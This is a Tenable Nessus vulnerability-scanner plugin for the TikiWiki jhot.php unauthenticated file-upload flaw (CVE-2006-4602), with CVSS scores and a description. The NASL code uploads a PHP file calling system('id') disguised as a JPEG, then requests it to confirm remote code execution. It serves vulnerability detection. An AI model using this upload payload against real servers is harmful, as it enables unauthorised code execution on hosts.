TikiWiki jhot.php Arbitrary File Upload

2006-09-0400:00:00

www.tenable.com

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.964

Percentile

99.6%

JSON

The ‘jhot.php’ script included with the version of TikiWiki installed on the remote host allows an unauthenticated attacker to upload arbitrary files to a known directory within the web server’s document root. Provided PHP’s ‘file_uploads’ setting is enabled, which is true by default, this flaw can be exploited to execute arbitrary code on the affected host, subject to the privileges of the web server user id.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(22303);
  script_version("1.28");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-4602");
  script_bugtraq_id(19819);
  script_xref(name:"EDB-ID", value:"2288");

  script_name(english:"TikiWiki jhot.php Arbitrary File Upload");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that allows uploading of
arbitrary files.");
  script_set_attribute(attribute:"description", value:
"The 'jhot.php' script included with the version of TikiWiki installed
on the remote host allows an unauthenticated attacker to upload
arbitrary files to a known directory within the web server's document
root.  Provided PHP's 'file_uploads' setting is enabled, which is true
by default, this flaw can be exploited to execute arbitrary code on
the affected host, subject to the privileges of the web server user
id.");
  script_set_attribute(attribute:"see_also", value:"https://tiki.org/tiki-index.php?page=ReleaseProcess195&bl");
  script_set_attribute(attribute:"solution", value:
"Either remove the affected 'jhot.php' script or upgrade to TikiWiki
1.9.5 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'TikiWiki jhot Remote Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/09/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/09/04");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:tikiwiki:tikiwiki");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl", "no404.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded: 0, php: 0);
if (get_kb_item("www/no404/" + port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/tiki", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Make sure the affected script exists.
  url = strcat(dir, "/jhot.php");
  w = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail: 1);

  # If it does...
  #
  # nb: the script doesn't respond when called directly.
  if (w[0] =~ "^HTTP/.* 200 OK")
  {
    # Try to exploit the flaw to execute a command.
    cmd = "id";
    fname = strcat(SCRIPT_NAME, "-", unixtime(), ".php");
    bound = "bound";
    boundary = strcat("--", bound);
    postdata = strcat(
      boundary, '\r\n', 
      'Content-Disposition: form-data; name="filepath"; filename="', fname, '";\r\n',
      'Content-Type: image/jpeg;\r\n',
      '\r\n',
      '<?php\r\n',
      'system(', cmd, '); \r\n',
      '?>\r\n',
      '\r\n',

      boundary, '--\r\n'
    );
    w = http_send_recv3(method:"POST", item: url, port: port, 
      content_type: "multipart/form-data; boundary="+bound,
      data: postdata, exit_on_fail: 1);
    
    # Now call the file we just uploaded.
    w = http_send_recv3(method:"GET", item: strcat(dir, "/img/wiki/", fname), port:port, exit_on_fail: 1);
    res = w[2];

    line = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res);
    if (line)
    {
      if (report_verbosity < 1) security_hole(port);
      else 
      {
        report = strcat(
          '\n',
          'Nessus was able to execute the command \'id\' on the remote host,\n',
          'which produced the following output :\n',
          '\n',
          data_protection::sanitize_uid(output:line)
        );
        security_hole(port:port, extra:report);
      }
      exit(0);
    }
  }
}